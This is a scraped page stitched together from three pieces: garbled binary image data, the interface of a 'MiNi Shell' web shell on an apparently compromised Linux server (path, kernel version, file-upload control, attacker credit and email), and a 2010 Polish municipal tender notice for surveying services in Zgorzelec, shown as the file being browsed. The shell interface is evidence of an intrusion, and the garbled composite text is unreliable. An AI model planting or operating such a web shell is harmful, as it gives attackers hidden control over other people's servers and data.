JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100824/262152-N-2010.html

<p class="kh_header"><b>Zgorzelec: Usługi geodezyjno-kartograficzne na terenie miasta Zgorzelec w 2010r.</b><br>
<b>Numer ogłoszenia: 262152 - 2010; data zamieszczenia: 24.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi geodezyjno-kartograficzne na terenie miasta Zgorzelec w 2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usług geodezyjno-kartograficznych na 
   terenie miasta Zgorzelec  w 2010 roku.  

2. Wykonywanie usług geodezyjno-kartograficznych obejmuje w szczególności 
    sporządzanie dokumentacji dotyczącej: 
    1) podziałów nieruchomości, 
    2) wznowienia i okazywania granic nieruchomościami, 
    3) sporządzania dokumentów do wprowadzania zmian użytków, 
    4) scalania działek. 

3. Szczegółowy zakres rzeczowo - ilościowy przedmiotu zamówienia określa załącznik 
    nr 8 do SIWZ, będący jednocześnie formularzem cenowym. 

4. Przedmiot zamówienia realizowany będzie sukcesywnie, w zależności od  potrzeb 
    Zamawiającego, na podstawie pisemnych zleceń wystawianych przez 
    Zamawiającego. 

5. Każdorazowo Zamawiający zawiadomi Wykonawcę  pisemnie,  faxem lub mailem o 
    konieczności odebrania zlecenia wykonania usługi.  

6. Zobowiązuje się Wykonawcę do odbioru zleceń, o których mowa w pkt. 3.4 SIWZ, 
    w terminie 3-ch dni kalendarzowych od otrzymania pisemnego zawiadomienia 
    przesłanego przez Zamawiającego w sposób określony w pkt. 3.5 SIWZ. 
    Powyższe  zlecenia Wykonawca każdorazowo odbierze w siedzibie Zamawiającego 
    tj. w   Wydziale Gospodarki  Nieruchomościami.

7. Wykonawca zwolniony będzie z obowiązku, o którym mowa w punkcie 3.6 SIWZ,  
   tylko w przypadku wystąpienia  zdarzeń  losowych niezależnych od Wykonawcy, 
   potwierdzonych w formie opisowej wraz z  dokumentami potwierdzającymi 
   powyższą  okoliczność. Nieuzasadnione  niestawienia się po odbiór zlecenia, będzie 
   powodowało naliczenie kary umownej, zgodnie z zapisami projektu umowy - 
   załącznik  nr 9 do SIWZ. 

8. Termin realizacji poszczególnych rodzajów prac geodezyjno-kartograficznych 
    będących przedmiotem zamówienia,  został określony  w formularzu cenowym - 
    załącznik nr 8 do SIWZ. 
 
9. Wykonawca zobowiązany jest dostarczyć do siedziby Zamawiającego 
    sporządzoną dokumentację wykonanej usługi, zgodną z treścią zlecenia, w 
    terminie określonym w  formularzu cenowym.  

10.Realizacja przedmiotu zamówienia, każdorazowo będzie poprzedzona protokołem 
    odbioru bez zastrzeżeń wykonanych usług potwierdzonych przez Zamawiającego i 
    Wykonawcę. 

11.Wykonawca sporządzi i dostarczy do siedziby Zamawiającego dokumentację dotyczącą:
    1) podziałów nieruchomości - w ilości 6 egzemplarzy projektu podziału wraz z 
        protokołem z czynności przebiegu granic nieruchomości podlegających 
        podziałowi, 
    2) wznowienia i okazywania granic nieruchomościami - w ilości 1 egzemplarz mapy 
        wraz z  protokołem z okazania granic, 
    3) sporządzania dokumentów do wprowadzania zmian użytków -  w ilości 1 
        egzemplarz mapy z wprowadzonymi zmianami użytków wraz z wyciągiem z 
        wykazu zmian gruntowych, 
    4) scalania działek - w ilości 2 egzemplarze mapy wraz z protokołem z czynności 
        przebiegu granic nieruchomości scalonych. 

12.Wykonawca w formularzu cenowym - załącznik nr 8 do SIWZ, określi ceny 
     jednostkowe brutto, oraz poda ogólną wartość brutto, za wykonanie wszystkich 
     rodzajów usług,  zgodnie z zakresem rzeczowym  przedmiotu zamówienia. 

13.Zamawiający zastrzega sobie możliwość zwiększenia lub zmniejszenia ilości 
     wykonywanych usług, wymienionych w formularzu cenowym, przy czym łączna 
     wartość wykonanych usług nie może przekroczyć kwoty ofertowej. 

14.Zamówienie należy zrealizować zgodnie z ustawą z dnia 21 sierpnia 1997r. o 
     gospodarce nieruchomościami (tekst jednolity z 2004r. Dz. U. Nr 261, poz. 2603 z 
     póź. zm), ustawą z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne (tekst 
     jednolity z 2005r. Dz. U. Nr 240, poz. 2027 z póź. zm.) oraz Rozporządzeniem 
     Rady Ministrów z dnia 7 grudnia 2004r. w sprawie sposobu i trybu dokonywania 
     podziałów nieruchomości (Dz. U. Nr 268, poz. 2663 z 2004r.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.33.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny. 
3)  Jako spełniający warunek udziału w postępowaniu zostaną ocenieni wykonawcy, 
     którzy wykażą wykonanie, a w przypadku świadczeń okresowych lub ciagłych 
     również wykonywanie minimum 3 usług  zgodnych z przedmiotem zamówienia tj. 
     usług geodezyjno-kartograficznych o łącznej wartości minimum 46 000, 00 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny. 
3) Jako spełniający warunek udziału w postępowaniu zostaną ocenieni Wykonawcy, 
    którzy wykażą, iż dysponują  minimum 1 osobą, która będzie wykonywać 
    zamówienie, posiadajacą uprawnienia zawodowe w dziedzinie geodezji i kartografii, 
    zgodnie z treścią art. 42-45 ustawy z dnia 17 maja 1989r. Prawo geodezyjno-
    kartograficzne (tekst jednolity z 2005r. Dz. U. Nr 240, poz. 2027)  oraz załączą 
    wraz z wykazem  oświadczenie, o posiadaniu przez w/w osobę uprawnień w 
    dziedzinie geodezji i kartografii.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
        1)  wypełniony i podpisany formularz Oferta (wg. załączonego wzoru), 
        2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
             (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
             konsorcjum), 
        3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. 
             Prawo  zamówień   publicznych - załącznik nr 2 do SIWZ, 
             W przypadku nie dołączenia do oferty powyższego załącznika, bądź jego 
             nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie
             własnymi siłami. 
             Uwaga!
             W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia 
             innych podmiotów, a nie załączy, bądź nie wypełni załącznika nr 2 do SIWZ 
             do oferty, Zamawiający nie będzie mógł uznać spełnienia warunku 
             określonego w pkt. 11.1 pkt. 1 SIWZ. 
        4)  wypełniony i podpisany formularz cenowy - załącznik nr 8 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy 
    czym warunki takiej zmiany Zamawiający określił  w § 10 projektu umowy. 
    1)	termin realizacji określony w pkt. 4 SIWZ i § 2 ust.1 projektu umowy oraz 
        terminy realizacji określone w formularzu cenowym ulegną  przesunięciu w 
        przypadku wystąpienia opóźnień wynikających z:  
        a) przekroczenia ustawowych terminów  w wydawaniu przez organy 
            administracji publicznej decyzji, zezwoleń itp.
        b) opóźnień z powodu wystąpienia warunków   atmosferycznych 
            uniemożliwiających wykonywanie usług   - fakt ten musi być zgłoszony 
            w formie pisemnej  do Zamawiającego, 
        c) zaistnienia przypadku działania siły wyższej, przez którą rozumieć należy 
            zdarzenie zewnętrzne o charakterze: niezależnym od stron, którego strony 
            nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć 
            ani któremu strony nie mogły zapobiec przy zachowaniu należytej 
            staranności, której nie można przypisać drugiej stronie. 
            Za siłę wyższą warunkującą zmianę umowy uważać się będzie w 
            szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie 
            dotyczą pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, 
            nagłe przerwy  w dostawie energii elektrycznej, promieniowanie, lub 
            skażenia, 
        d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
            wpływ na realizację przedmiotu zamówienia,                  
       2)  Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych 
            za realizację umowy, o których mowa w § 9 ust.1 i 2   projektu umowy.
2. W przedstawionych w punkcie  1 podpunkt 1 przypadkach wystąpienia opóźnień,   
    strony ustalają nowe terminy realizacji niniejszej umowy, z tym, że okres  
    przesunięcia terminu realizacji przedmiotu umowy równy będzie co najmniej 
    okresowi przerwy lub postoju. 
3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie 
    powstałych okoliczności w formie opisowej i właściwie umotywowanej, 
    potwierdzonej  przez  każdą  ze stron umowy. 

4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2010 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com